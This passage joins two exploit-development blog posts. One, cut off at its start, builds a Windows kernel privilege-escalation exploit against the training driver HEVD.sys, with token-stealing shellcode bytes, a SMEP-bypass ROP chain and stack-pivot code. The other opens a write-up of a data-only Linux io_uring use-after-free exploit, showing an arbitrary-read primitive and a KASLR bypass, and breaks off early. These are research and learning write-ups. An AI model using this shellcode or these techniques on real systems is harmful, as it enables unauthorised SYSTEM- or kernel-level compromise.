0x01, 0x00, 0x00, 0x4c, 0x8b, 0x9a, 0x78, 0x01, 0x00, 0x00,
0x48, 0x8b, 0xa2, 0x80, 0x01, 0x00, 0x00, 0x48, 0x8b, 0xaa,
0x58, 0x01, 0x00, 0x00, 0x31, 0xc0, 0x0f, 0x01, 0xf8, 0x48,
0x0f, 0x07, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff };
// Allocating shellcode in a pre-defined address [0x80000000]
LPVOID shellcode = VirtualAlloc((LPVOID)0x80000000, sizeof(sc), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
RtlCopyMemory(shellcode, sc, 256);
// Allocating Fake Stack with ROP chain in a pre-defined address [0x48000000]
int index = 0;
LPVOID fakeStack = VirtualAlloc((LPVOID)0x48000000, 0x10000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
QWORD* _fakeStack = reinterpret_cast<QWORD*>((INT64)0x48000000 + 0x28); // add esp, 0x28
_fakeStack[index++] = SMEPBypass.POP_RCX; // POP RCX
_fakeStack[index++] = 0x3506f8 ^ 1UL << 20; // CR4 value (bit flip)
_fakeStack[index++] = SMEPBypass.MOV_CR4_RCX; // MOV CR4, RCX
_fakeStack[index++] = (INT64)shellcode; // JMP SHELLCODE
USER_CONTROLLED_OBJECT UBUF = { 0 };
// Malicious user-controlled struct
UBUF.ObjectID = 0x4141414141414141;
UBUF.ObjectType = (INT64)SMEPBypass.STACK_PIVOT; // This address will be "[CALL]ed"
if (NtDeviceIoControlFile((HANDLE)sock, nullptr, nullptr, nullptr, &ioStatusBlock, ioctlCode, &UBUF,
0x123, &outBuffer, 0x321) != STATUS_SUCCESS) {
std::cout << "\t[-] Failed to send IOCTL request to HEVD.sys" << std::endl;
}
return 0;
}

int main() {
SMEPBypassInitializer();
exploit();
return 0;
}

After exploit executes, we have the follow WinDBGoutput:

[CALL] pre-calculated addresses, in order to change current RSP value for 0x48000000 (user-controlled)
Segmentation Fault poped out after mov esp, 0x48000000 execution
Analysis of the segmentation fault error

After mov esp, 0x48000000instruction execution, we notice that it crashed and returned a segmentation fault as an exception named UNEXPECTED_KERNEL_MODE_TRAP (7F), now let’s see our stack.

Stack frame after crash

So, what can we do next?

Memory and Components

Now this blogpost can really start. After all briefing covering the techniques, it’s time to explain why stack is one of the most confuse things in a exploitation development, we will see how it can easily turn a simple vulnerability attack into a brain-death issue.

Kernel Memory Management

An oversimplification of how a kernel connects application software to the hardware of a computer (wikipedia)

Now, we’ll have to go deep into Memory Managment topic as way to understand concepts about Memory Segments, Virtual Allocation, and Paging.

According to Wikipedia

The kernel has full access to the system’s memory and must allow processes to safely access this memory as they require it. Often the first step in doing this is virtual addressing, usually achieved by paging and/or segmentation. Virtual addressing allows the kernel to make a given physical address appear to be another address, the virtual address.
<…snip…>
In computing, a virtual address space (VAS) or address space is the set of ranges of virtual addresses that an operating system makes available to a process.[1] The range of virtual addresses usually starts at a low address and can extend to the highest address allowed by the computer’s instruction set architecture and supported by the operating system’s pointer size implementation, which can be 4 bytes for 32-bit or 8 bytes for 64-bit OS versions. This provides several benefits, one of which is security through process isolation assuming each process is given a separate address space.

As we can see, Virtual Addressing refers to the space addressedfor each user-application and kernel functions, reserving memory spaces during a OS usage. When an application is initialized, the operation system understand that needs to allocate new space in memory, addressing into a valid range of addresses, consequently avoiding damaging kernel current memory region.

That’s the case when you try toplay a game, and for some reason, a bunch of GB’s from your current memory increasesbefore the game starts, all data was allocated and most of this dataand addresses initiates nullified until game file-data starts to be loaded into memory.

With the use of malloc() and VirtualAlloc() functions, you can actually “address” a range of Virtual Memory into a defined address, that’s why Stack Pivoting is the best solution for make this exploit works.

Virtual Memory

Address difference betwen physical/virtual memory

As you can see in the above image, Virtual Addresses communicates to application/processby sending data and values, so the processes can be able to query, allocateor freeeach data any time.

As Wikipedia says:

In computing, virtual memory, or virtual storage,[b] is a memory management technique that provides an “idealized abstractionof the storage resources that are actually available on a given machine”[3] which “creates the illusionto users of a very large (main) memory”.[4]
The computer’s operating system, using a combination of hardwareand software, maps memory addresses used by a program, called virtual addresses, into physical addresses in computer memory. Main storage, as seen by a process or task, appears as a contiguous address space or collection of contiguous segments. The operating system manages virtual address spaces and the assignment of real memory to virtual memory.[5] Address translation hardware in the CPU, often referred to as a Memory Management Unit (MMU), automatically translates virtual addresses to physical addresses. Softwarewithin the operating system may extend these capabilities, utilizing, e.g., disk storage, to provide a virtual address space that can exceed the capacity of real memory and thus reference more memory than is physicallypresent in the computer.
The primary benefits of virtual memory include freeingapplications from having to manage a shared memory space, ability to share memory used by libraries betweenprocesses, increased security due to memory isolation, and being able to conceptually use more memory than might be physicallyavailable, using the technique of pagingor segmentation.

As mentioned before, addressing/allocating Virtual Memory ranges (from a user-land perspective), allow us to manipulate de usage of addresses data into our current application, but that’s a problem. When an address range of Virtual Memory is allocated, still not part of OS physical operations due the abstracted/fake allocation into memory. Following the idea of our previous example, when a gamestarts, Virtual Memory is allocated and Memory Management Unit (MMU) automatically traslate data between physical and virtualaddresses.

From a developer perspective, when an application consumes memory, it’s important to free()/VirtualFree() unused data, to preventdata won’t crashthe whole application, once so many addresses are set to be in use by the system. Also, OS can deal with processes which consumes many addresses, automatically closing this ones avoidingcritical errors. There cases that applications exceed the capacity of RAM free space, in this situations, the allocation can be extended into Disk Storage.

Paged Memory

Physical memory also called Paged Memory, imply to memory which is in use by applications and processes. This memory scheme can retrivedata from Virtual Allocations, consequently utilizing it data as part of current execution.

According to Wikipedia:

Memory Paging

In computer operating systems, memory paging (or swappingon some Unix-like systems) is a memory management scheme by which a computer stores and retrieves data from secondary storage[a] for use in main memory.[citation needed] In this scheme, the operating system retrieves data from secondary storage in same-size blocks called pages. Pagingis an important part of virtual memory implementations in modern operating systems, using secondary storage to let programs exceed the size of available physical memory.

Page faults

When a process tries to reference a page not currently mapped to a page frame in RAM, the processor treats this invalid memory reference as a page fault and transfers control from the program to the operating system.

Page Table

A page table is the data structure used by a virtual memory system in a computer operating system tostore the mapping between virtual addresses and physical addresses. Virtual addresses are used by the program executed by the accessing process, while physical addresses are used by the hardware, or more specifically, by the Random-Access Memory (RAM) subsystem. The page table is a key component of virtual address translation that is necessary to access data in memory.

Kernel can identifies when an address lies in a Paged Memoryspace by utilizing Page Table Entry (PTE) , which differs each type of allocation and mapping memory segments.

With Page Table Entry (PTE), Kernel is able to map the correct offset in order to translatedata between each address. If there’s a invalid mapped memory region in the translations, a Page Fault is returned, and OS crashes. In case of Windows Kernel, a _KTRAP_FRAME is called, and an error should be expected as bellow:

Stack Frame after exploit execution

Virtual Allocation issues in Windows System

When a binary exploit is developed, memory must to be manipulate in most of the cases. Through C/C++ functions as VirtualAlloc(), if you manage to allocate data into address 0x48000000with size 0x1000, your current address 0x48000000are now “addressed” into Page Table as a Virtual Address until 0x48001000 and it will NOT be treat as part of Physical Memory by Kernel (remains as Non-Paged one). It’s important to pay attention in this detail thus if you try to use the example above in a Kernel-Landperspective, a Trap Frame will be handled by WinDBGas follows:

Trying to use Virtual Memory in Kernel scheme cause _KTRAP_FRAME

To deal with this issue, we can use VirtualLock()function from C/C++once it locks the specified region of the process’s virtual address space into physical memory, thus preveting Page Faults. So, with that in mind, we can now changes our Virtual Memory Addressto a Physicalone.

Now should be possible to achieve code execution, right?

<...snip...>
// Allocating Fake Stack with ROP chain in a pre-defined address [0x48000000]
int index = 0;
LPVOID fakeStack = VirtualAlloc((LPVOID)0x48000000, 0x10000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
QWORD* _fakeStack = reinterpret_cast<QWORD*>((INT64)0x48000000 + 0x28); // add esp, 0x28
_fakeStack[index++] = SMEPBypass.POP_RCX; // POP RCX
_fakeStack[index++] = 0x3506f8 ^ 1UL << 20; // CR4 value (bit flip)
_fakeStack[index++] = SMEPBypass.MOV_CR4_RCX; // MOV CR4, RCX
_fakeStack[index++] = (INT64)shellcode; // JMP SHELLCODE
// Mapping address to Physical Memory <------------
if (VirtualLock(fakeStack, 0x10000)) {
std::cout << "[+] Address Mapped to Physical Memory" << std::endl;
USER_CONTROLLED_OBJECT UBUF = { 0 };
// Malicious user-controlled struct
UBUF.ObjectID = 0x4141414141414141;
UBUF.ObjectType = (INT64)SMEPBypass.STACK_PIVOT; // This address will be "[CALL]ed"
if (NtDeviceIoControlFile((HANDLE)sock, nullptr, nullptr, nullptr, &ioStatusBlock, ioctlCode, &UBUF,
0x123, &outBuffer, 0x321) != STATUS_SUCCESS) {
std::cout << "\t[-] Failed to send IOCTL request to HEVD.sys" << std::endl;
}
return 0;
}
<...snip...>
Calling our Stack Pivoting gadget
Exception from WinDBG
Again another UNEXPECTED_KERNEL_MODE_TRAP (7f)

Again, the same error popped out even with address mapped into Physical Memory.

Pain and Suffer due DoubleFaults

After million of tests, with different patterns of memory allocations, i’ve found a solution attempt. According to Martin Mielke and kristal-g, a reserved memory space should be used before the main allocation from address 0x48000000.

Kristal-G explanation about the cause of DoubleFault Exception
0x47fffff70 address being used by StackFrame

When a Trap Frameoccur, we can clearly notice that lower addresses from 0x48000000are used by stack, and if these addresses keeps with unallocated status, they can’t be used by current stack frame.

As you can see, 0x47fffff70is being utilized by ourstack frame, but once we are starting the allocation from 0x48000000address, it won’t be a valid one. To deal with this issue, a reservationmemory before 0x48000000 must be done.

<...snip...>
LPVOID fakeStack = VirtualAlloc((LPVOID)((INT64)0x48000000-0x1000), 0x10000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
<...snip...>

Now we can actually allocate into 0x48000000–0x1000 address, finally allowing us to ignore DoubleFaultexception.

Let’s run our exploit again, it should works!

Again….
TrapFrame from 0x47fffff70 desapeared after memory allocation

No matter how you give a try to manage memory, changing addresses or fill up stackwith datahoping that works well, it will always catchand returns an exceptioneven when your code seems to be correct. it took me a while 3 monthsof rebooting my VM, and trying to change code to understand why it still happening.

Stack vs DATA

Let’s imagine stack frame as a “big ball pit”, and there are located a bunch of data, and when a new ball is “placed” in this space, all the others “changes” their location. That’s exatcly what happens when you tries to manipulate memory, changing current stack to an another one as mov esp, 0x48000000 does. When a modification of current stack frame is done, the same “believes” that current Physical Memory are mappedto another processes, and for some reason, you can actually see things like this after crash.

<...snip...>
LPVOID fakeStack = VirtualAlloc((LPVOID)((INT64)0x48000000 - 0x1000), 0x10000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
// Reserved memory before Stack Pivoting
*(INT64*)(0x48000000 - 0x1000) = 0xDEADBEEFDEADBEEF;
*(INT64*)(0x48000000 - 0x900) = 0xDEADBEEFDEADBEEF;

QWORD* _fakeStack = reinterpret_cast<QWORD*>((INT64)0x48000000 + 0x28); // add esp, 0x28
int index = 0;
_fakeStack[index++] = SMEPBypass.POP_RCX; // POP RCX
_fakeStack[index++] = 0x3506f8 ^ 1UL << 20; // CR4 value (bit flip)
_fakeStack[index++] = SMEPBypass.MOV_CR4_RCX; // MOV CR4, RCX
_fakeStack[index++] = (INT64)shellcode; // JMP SHELLCODE
<...snip...>
Crash after mov esp, 0x48000000

After pollute Stack Frame in a reserved space before Stack Pivoting offsetwe can cleary notice that different addresses poped out into our current Stack Frame, but our Trap Frame still remains the same as before 0x47fffe70. If we fill up all stack with 0x41bytes, we’ll notice that some bytes will appear with different values as below:

<...snip...>
// Filling up reserved space memory
RtlFillMemory((LPVOID)(0x48000000 - 0x1000), 0x1000, 'A');
QWORD* _fakeStack = reinterpret_cast<QWORD*>((INT64)0x48000000 + 0x28); // add esp, 0x28
int index = 0;
_fakeStack[index++] = SMEPBypass.POP_RCX; // POP RCX
_fakeStack[index++] = 0x3506f8 ^ 1UL << 20; // CR4 value (bit flip)
_fakeStack[index++] = SMEPBypass.MOV_CR4_RCX; // MOV CR4, RCX
_fakeStack[index++] = (INT64)shellcode; // JMP SHELLCODE
<...snip...>
0x41 bytes into our reserved memory space pops into Stack Frame

With this results in mind, we have some alternatives to considerate for this situation:

  • Increase size of reserved memoryspace.
  • Try to find a fix to the Stack Frame due the situation we actually can’t reserve memory before Stack Pivoting space.

So, let’s give a try at first to increase the space of our reserved memory

<...snip...>
// Allocating Fake Stack with ROP chain in a pre-defined address [0x48000000]
LPVOID fakeStack = VirtualAlloc((LPVOID)((INT64)0x48000000 - 0x5000), 0x10000, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
// Filling up reserved space memory
// Size increased to 0x5000
RtlFillMemory((LPVOID)(0x48000000 - 0x5000), 0x5000, 'A');
QWORD* _fakeStack = reinterpret_cast<QWORD*>((INT64)0x48000000 + 0x28); // add esp, 0x28
int index = 0;
_fakeStack[index++] = SMEPBypass.POP_RCX; // POP RCX
_fakeStack[index++] = 0x3506f8 ^ 1UL << 20; // CR4 value (bit flip)
_fakeStack[index++] = SMEPBypass.MOV_CR4_RCX; // MOV CR4, RCX
_fakeStack[index++] = (INT64)shellcode; // JMP SHELLCODE
<...snip...>
mov esp, 0x48000000 won’t caught any error, and our RIP register get fowarded into add esp, 0x28
After that, a DoubleFault exception was caught due add esp, 0x28
svchost.exe Crashed when add, esp 0x28 executes

For some reason, after increased our reserved memory before mov esp, 0x48000000, the whole kernel has crashed, and when 0x48000000is moved into our current RSPregister, our stack framechanges to the User Processes Contextdue the size of address it self. That’s why i’ve mentioned before that stack seems to be a “Ball pit” sometimes, and after all, we still getting the same Trap Frame exception.

No matter how you try to manipulate memory, it always will be caught and it will crash some application, after that, WinDBGwill handle it as an exception and BSODyour system in a terrible horror movie.

My experience trying everything that i had, to pass through this exception

Breakpoints??…. ooohh!…. Breakpoints!!!!

INT3, a.k.a 0xCCand breakpoints, can be defined as a signalfor any debbugerto catchand stop an execution of attached processesor a current development code. It can be performed by “clicking” into a debug option in some part of an IDE UIor by insertingINT3instruction directly into target process through0xCC opcode. So, in a WinDBGcommand line, a command named bp still available to breakpointaddresses as follow:

// Common Breakpoint, just stop into this address before it runs
bp 0x48000000

// Conditional Breakpoint, stop when r12 register is not equal to 1337
// if not equal, changes current r12 value to 0x1337
// if equal, changes r12 reg value with r13 one
bp 0x48000000 ".if( @r12 != 0x1337) { r12=1337 }.else { r12=r13 }"

etc...

Also, it’s possible to enjoy the use of this mechanism to breakpointa shellcode, and see if it code is running correctly during a exploitation development phase.

BYTE sc[256] = {
0xcc, // <--- We send a debbuger signal and stop it execution
// before code execution
0x65, 0x48, 0x8b, 0x04, 0x25, 0x88, 0x01, 0x00, 0x00, 0x48,
0x8b, 0x80, 0xb8, 0x00, 0x00, 0x00, 0x49, 0x89, 0xc0, 0x4d,
0x8b, 0x80, 0x48, 0x04, 0x00, 0x00, 0x49, 0x81, 0xe8, 0x48,
0x04, 0x00, 0x00, 0x4d, 0x8b, 0x88, 0x40, 0x04, 0x00, 0x00,
0x49, 0x83, 0xf9, 0x04, 0x75, 0xe5, 0x49, 0x8b, 0x88, 0xb8,
0x04, 0x00, 0x00, 0x80, 0xe1, 0xf0, 0x48, 0x89, 0x88, 0xb8,
0x04, 0x00, 0x00, 0x65, 0x48, 0x8b, 0x04, 0x25, 0x88, 0x01,
0x00, 0x00, 0x66, 0x8b, 0x88, 0xe4, 0x01, 0x00, 0x00, 0x66,
0xff, 0xc1, 0x66, 0x89, 0x88, 0xe4, 0x01, 0x00, 0x00, 0x48,
0x8b, 0x90, 0x90, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x8a, 0x68,
0x01, 0x00, 0x00, 0x4c, 0x8b, 0x9a, 0x78, 0x01, 0x00, 0x00,
0x48, 0x8b, 0xa2, 0x80, 0x01, 0x00, 0x00, 0x48, 0x8b, 0xaa,
0x58, 0x01, 0x00, 0x00, 0x31, 0xc0, 0x0f, 0x01, 0xf8, 0x48,
0x0f, 0x07, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff, 0xff,
0xff, 0xff, 0xff, 0xff, 0xff
};

According to Wikipedia:

The INT3 instruction is a one-byte-instruction defined for use by debuggers to temporarily replacean instruction in a running program in order to set a code breakpoint. The more general INT XXh instructions are encoded using two bytes. This makes them unsuitable for use in patching instructions (which can be one byte long); see SIGTRAP.
The opcode for INT3 is 0xCC, as opposed to the opcode for INT immediate8, which is 0xCD immediate8. Since the dedicated 0xCC opcode has some desired special properties for debugging, which are not shared by the normal two-byte opcode for an INT3, assemblers do not normally generate the generic 0xCD 0x03 opcode from mnemonics.

After an explanation about breakpoints, it’s important to note that every previous tests are made withbreakpointsin order to develop our exploit, but it’s time to forget it and skip all INT3 instructions.

Let’s give a try to re-run our exploit without the needing of breakpointa thing.

cmd.exe opens and no crashes are caught

Kernel won’t crashes anymore, and system memory still intact!

Now shellcodeis being executed after our SMEPbypass through theROP chainand we’re now able to spawn a NT AUTHORITY\SYSTEMshell.

YES!! VICTORY!!

BAAAM!! Finally!!!! aNT AUTHORITY\SYSTEMshell after all!

Breakpoints…. HAHA!! BREAKPOINTS!

So, now we can pay attention that breakpointsalso can be a dangerous thing into a exploitation development.

The explanation about this issue seems to be very simple. When WinDBG debbuger catchesan exceptionfrom kernel, Operation Systemgets a signal that something went wrong occurred, but when a Stack Manipulation is being doing, everythingthat you do is an exception. The Operation Systemdon’t understand that “an attacker is trying to manipulate Stack”, he just catchand rebootit self because the Stackare different from your current kernel context.

This headhache occurs likeStructured Exception Handling (SEH)vulnerabilities, once when the set of breakpointsand even a debbugerinto a process, can cause crashes or unitilizationof the same.

In my case, a away to pass through exceptionis by ignoring all breakpoints, and let kernel don’t reboot with a Non-Criticalexception.

Final Considerations

With this blogpost, i’ve learned alot of content that i didn’t knew before starting to write. It was a fun experience and extreme technical (specially for me), it took me 2 days to write about a thing which cost me 3 months long! you should probably had 10 minutes read, which is awesome and makes me happy too!

It’s important to note that most of this blogpost are deep explaining about memory itself, and trying to showing off how as an attacker is possible to improve our way to deal with troubles, looking around for all possibilities which can help us to achieve our goals, in that caseNT AUTHORITY\SYSTEM shell.

Beware of Stackand Breakpoints, this things can be a headache sometimes, and you will NEVER know until you think about changes your attack methodoly.

Thanks to the people who helped me along all this way:

  • First of all, thanks to my husband who holded me on, when I got myself stressed, with no clue what to do, and with alot of nightmares along all this months!
  • @xct_de
  • @gal_kristal
  • @33y0re

Hope you enjoyed!

Exploit Link (not so important at all)

References

Escaping the Google kCTF Container with a Data-Only Exploit

By: h0mbre
29 July 2023 at 04:00

Introduction

I’ve been doing some Linux kernel exploit development/study and vulnerability research off and on since last Fall and a few months ago I had some downtime on vacation to sit and challenge myself to write my first data-only exploit for a real bug that was exploited in kCTF. io_ring has been a popular target in the program’s history up to this point, so I thought I’d find an easy-to-reason-about bug there that had already been exploited as fertile ground for exploit development creativity. The bug I chose to work with was one which resulted in a struct file UAF where it was possible to hold an open file descriptor to the freed object. There have been quite a few write-ups on file UAF exploits, so I decided as a challenge that my exploit had to be data-only. The parameters of the self-imposed challenge were completely arbitrary, but I just wanted to try writing an exploit that didn’t rely on hijacking control flow. I have written quite a few Linux kernel exploits of real kCTF bugs at this point, probably 5-6 as practice, just starting with the vulnerability and going from there, but all of them have ended up in me using ROP, so this was my first try at data-only. I also had not seen a data-only exploit for a struct file UAF yet, which was encouraging as it seemed it was worthwile “research”. Also, before we get too far, please do not message me to tell me that someone already did xyz years prior. I’m very new to this type of thing and was just doing this as a personal challenge, if some aspects of the exploit are unoriginal, that is by coincidence. I will do my best to cite all my inspiration as we go.

The Bug

The bug is extremely simple (why can’t I find one like this?) and was exploited in kCTF in November of last year. I didn’t look very hard or ask around in the kCTF discord, but I was not able to find a PoC for this particular exploit. I was able to find several good write-ups of exploits leveraging similar vulnerabilities, especially this one by pqlpql and Awarau: https://ruia-ruia.github.io/2022/08/05/CVE-2022-29582-io-uring/.

I won’t go into the bug very much because it wasn’t really important to the excercise of being creative and writing a new kind of exploit (new for me); however, as you can tell from the patch, there was a call to put (decrease) a reference to a file without first checking if the file was a fixed file in the io_uring. There is this concept of fixed files which are managed by the io_uring itself, and there was this pattern throughout that codebase of doing checks on request files before putting them to ensure that they were not fixed files, and in this instance you can see that the check was not performed. So we are able from userspace to open a file (refcount == 1), register the file as a fixed file (recount == 2), call into the buggy code path by submitting an IORING_OP_MSG_RING request which, upon completion will erroneously decrement the refcount (refcount == 1), and then finally, call io_uring_unregister_files which ends up decrementing the recount to 0 and freeing the file while we still maintain an open file descriptor for it. This is about as good as bugs get. I need to find one of these.

What sort of variant analysis can we perform on this type of bug? I’m not so sure, it seems to be a broad category. But the careful code reviewer might have noticed that everywhere else in the codebase when there was the potential of putting a request file, the authors made sure to check if the file was fixed or not. This file put forgot to perform the check. The broad lesson I learned from this was to try and find instances of an action being performed multiple times in a codebase and look for descrepancies between those routines.

Giant Shoulders

It’s extremely important to stress that the blogpost I linked above from @pqlpql and @Awarau1 was very instrumental to this process. In that blogpost they broke-down in exquisite detail how to coerce the Linux kernel to free an entire page of file objects back to the page allocator by utilizing a technique called “cross-cache”. file structs have their own dedicated cache in the kernel and so typical object replacement shenanigans in UAF situations aren’t very useful in this instance, regardless of the struct file size. Thanks to their blogpost, the concept of “cross-cache” has been used and discussed more and more, at least on Twitter from my anecdotal experience.

Instead of using this trick of getting our entire victim page of file objects sent back to the page allocator only to have the page used as the backing for general cache objects, I elected to have the page reallocated in the form of the a pipe buffer. Please see this blogpost by @pqlpql for more information (this is a great writeup in general). This is an extremely powerful technique because we control all of the contents of the pipe buffer (via writes) and we can read 100% of the page contents (via reads). It’s also extremely reliable in my expierence. I’m not going to go into too much depth here because this wasn’t any of my doing, this is 100% the people mentioned thus far. Please go read the material from them.

Arbitrary Read

The first thing I started to look for, was a way to leak data, because I’ve been hardwired to think that all Linux kernel exploits follow the same pattern of achieving a leak which defeats KASLR, finding some valuable objects in memory, overwriting a function pointer blah blah blah. (Turns out this is not the case and some really talented people have really opened my mind in this area.) The only thing I knew for certain at this point was I have an open file descriptor at my disposal so let’s go looking around the file system code in the Linux kernel. One of the first things that caught my eye was the fcntl syscall in fs/fcntl.c. In general what I was doing at this point, was going through syscall tables for the Linux kernel and seeing which syscalls took an fd as an argument. From there, I would visit the portion of the kernel codebase which handled that syscall implementation and I would ctrl-f for the function copy_to_user. This seemed like a relatively logical way to find a method of leaking data back to userspace.

The copy_to_user function is a key part of the Linux kernel’s interface with user space. It’s used to copy data from the kernel’s own memory space into the memory space of a user process. This function ensures that the copy is done safely, respecting the separation between user and kernel memory.

Now if you go to the source code and do the find on copy_to_user, the 2nd result is a snippet in this bit right here:

static long fcntl_rw_hint(struct file *file, unsigned int cmd,
			  unsigned long arg)
{
	struct inode *inode = file_inode(file);
	u64 __user *argp = (u64 __user *)arg;
	enum rw_hint hint;
	u64 h;

	switch (cmd) {
	case F_GET_RW_HINT:
		h = inode->i_write_hint;
		if (copy_to_user(argp, &h, sizeof(*argp)))
			return -EFAULT;
		return 0;
	case F_SET_RW_HINT:
		if (copy_from_user(&h, argp, sizeof(h)))
			return -EFAULT;
		hint = (enum rw_hint) h;
		if (!rw_hint_valid(hint))
			return -EINVAL;

		inode_lock(inode);
		inode->i_write_hint = hint;
		inode_unlock(inode);
		return 0;
	default:
		return -EINVAL;
	}
}

You can see that in the F_GET_RW_HINT case, a u64 (“h”), is copied back to userspace. That value comes from the value of inode->i_write_hint. And inode itself is returned from file_inode(file). The source code for that function is as follows:

static inline struct inode *file_inode(const struct file *f)
{
	return f->f_inode;
}

Lol, well then. If we control the file, then we control the inode as well. A struct file looks like this:

struct file {
	union {
		struct llist_node	fu_llist;
		struct rcu_head 	fu_rcuhead;
	} f_u;
	struct path		f_path;
	struct inode		*f_inode;	/* cached value */
<SNIP>

And since we’re using the pipe buffer as our replacement object (really the entire page), we can set inode to be an arbitrary address. Let’s go check out the inode struct and see what we can learn about this i_write_hint member.

struct inode {
	umode_t			i_mode;
	unsigned short		i_opflags;
	kuid_t			i_uid;
	kgid_t			i_gid;
	unsigned int		i_flags;

#ifdef CONFIG_FS_POSIX_ACL
	struct posix_acl	*i_acl;
	struct posix_acl	*i_default_acl;
#endif

	const struct inode_operations	*i_op;
	struct super_block	*i_sb;
	struct address_space	*i_mapping;

#ifdef CONFIG_SECURITY
	void			*i_security;
#endif

	/* Stat data, not accessed from path walking */
	unsigned long		i_ino;
	/*
	 * Filesystems may only read i_nlink directly.  They shall use the
	 * following functions for modification:
	 *
	 *    (set|clear|inc|drop)_nlink
	 *    inode_(inc|dec)_link_count
	 */
	union {
		const unsigned int i_nlink;
		unsigned int __i_nlink;
	};
	dev_t			i_rdev;
	loff_t			i_size;
	struct timespec64	i_atime;
	struct timespec64	i_mtime;
	struct timespec64	i_ctime;
	spinlock_t		i_lock;	/* i_blocks, i_bytes, maybe i_size */
	unsigned short          i_bytes;
	u8			i_blkbits;
	u8			i_write_hint;
<SNIP>

So i_write_hint is a u8, aka, a single byte. This is perfect for what we need, inode becomes the address from which we read a byte back to userland (plus the offset to the member).

Since we control 100% of the backing data of the file, we thus control the value of the inode member. So if we set up a fake file struct in memory via our pipe buffer and have the inode member be 0x1337, the kernel will try to deref 0x1337 as an address and then read a byte at the offset of the i_write_hint member. So this is an arbitrary read for us, and we found it in the dumbest way possible.

This was really encouraging for me that we found an arbitrary read gadget so quickly, but what should we aim the read at?

Finding a Read Target

So we can read data at any address we want, but we don’t know what to read. I struggled thinking about this for a while, but then remembered that the cpu_entry_area was not randomized boot to boot, it is always at the same address. I knew this from the above blogpost about the file UAF, but also vaguely from @ky1ebot tweets like this one.

cpu_entry_area is a special per-CPU area in the kernel that is used to handle some types of interrupts and exceptions. There is this concept of Interrupt Stacks in the kernel that can be used in the event that an exception must be handled for instance.

After doing some debugging with GDB, I noticed that there was at least one kernel text pointer that showed up in the cpu_entry_area consistently and that was an address inside the error_entry function which is as follows:

SYM_CODE_START_LOCAL(error_entry)
	UNWIND_HINT_FUNC

	PUSH_AND_CLEAR_REGS save_ret=1
	ENCODE_FRAME_POINTER 8

	testb	$3, CS+8(%rsp)
	jz	.Lerror_kernelspace

	/*
	 * We entered from user mode or we're pretending to have entered
	 * from user mode due to an IRET fault.
	 */
	swapgs
	FENCE_SWAPGS_USER_ENTRY
	/* We have user CR3.  Change to kernel CR3. */
	SWITCH_TO_KERNEL_CR3 scratch_reg=%rax
	IBRS_ENTER
	UNTRAIN_RET

	leaq	8(%rsp), %rdi			/* arg0 = pt_regs pointer */
.Lerror_entry_from_usermode_after_swapgs:

	/* Put us onto the real thread stack. */
	call	sync_regs
	RET
<SNIP>

error_entry seemed to be used as an entry point for handling various exceptions and interrupts, so it made sense to me that an offset inside the function, might be found on what I was guessing was an interrupt stack in the cpu_entry_area. The address was the address of the call sync_regs portion of the function. I was never able to confirm what types of common exceptions/interrupts would’ve been taking place on the system that was pushing that address onto the stack presumably when the call was executed, but maybe someone can chime in and correct me if I’m wrong about this portion of the exploit. It made sense to me at least and the address’ presence in the cpu_entry_area was extremely common to the point that it was never absent during my testing. Armed with a kernel text address at a known offset, we could now defeat KASLR with our arbitrary read. At this point we have the read, the read target, and KASLR defeated.

Again, this portion didn’t take very long to figure out because I had just been introduced to cpu_entry_area by the aforementioned blogposts at the time.

Where are the Write Gadgets?

